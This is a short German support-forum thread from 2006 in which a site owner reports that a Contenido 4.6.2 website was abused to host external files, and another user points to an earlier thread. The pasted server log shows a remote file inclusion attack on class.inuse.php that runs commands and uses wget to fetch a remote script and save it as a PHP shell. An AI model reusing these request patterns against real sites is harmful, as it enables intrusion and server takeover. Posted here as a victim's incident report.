Seite 1 von 1

Sicherheitslücke?

Verfasst: Mo 6. Feb 2006, 14:43
von fancypants.ch
Hi

Ich benütze die Contenido Version 4.6.2! Ich habe damit eine Website für eine Krankenkasse erstellt und es läuft eigentlich alles prima!

Die Seite wird über ein Informatik-Büro gehostet, von welchem ich heute die Mitteilung erhalten habe, dass die oben genannte Website über 80 GB Traffic verursacht hat.

Der Provider kam zum Schluss, dass über die Website Filme von Externen gehostet wurde.

Hier ist der Server-Log:

Code: Alles auswählen

host-84-222-96-172.cust-adsl.tiscali.it - - [24/Jan/2006:21:21:12 +0100] "GET /neu/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.s0l4r1sr0x.com/tool.gif?&cmd=i HTTP/1.1" 200 9016 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8) Gecko/20051111 Firefox/1.5"
host-84-222-96-172.cust-adsl.tiscali.it - - [24/Jan/2006:21:21:27 +0100] "GET /neu/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.s0l4r1sr0x.com/tool.gif?&cmd=id HTTP/1.1" 200 9051 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8) Gecko/20051111 Firefox/1.5"
host-84-222-96-172.cust-adsl.tiscali.it - - [24/Jan/2006:21:22:05 +0100] "GET /neu/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.s0l4r1sr0x.com/tool.gif?&cmd=wget%20http://users.cjb.net/lupor0x/r.txt;mv%20r.txt%20rs.php;ls%20-al HTTP/1.1" 200 13374 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8) Gecko/20051111 Firefox/1.5"
es sieht so aus, dass sie die "class.inuse.php" dazu benutzt haben, ume die Files auf den Webspace zu laden. Auf der entsprechenden Seite, welche ich im Internet gefunden haben, stehen lauter Links zu Files welche auf Servern mit Contenido laufen!

kann mir jemand weiterhelfen??

Grüsse

Verfasst: Mo 6. Feb 2006, 14:46
von rezeptionist
Mods bitte wieder die suche einschalten bitte :wink:

http://contenido.org/forum/viewtopic.php?t=11380

Verfasst: Mo 6. Feb 2006, 14:51
von fancypants.ch
danke für die rasche antwort.

habe die suche benutzt, doch leider..naja, wer zu dumm zum suchen ist findet auch nichts!

*close*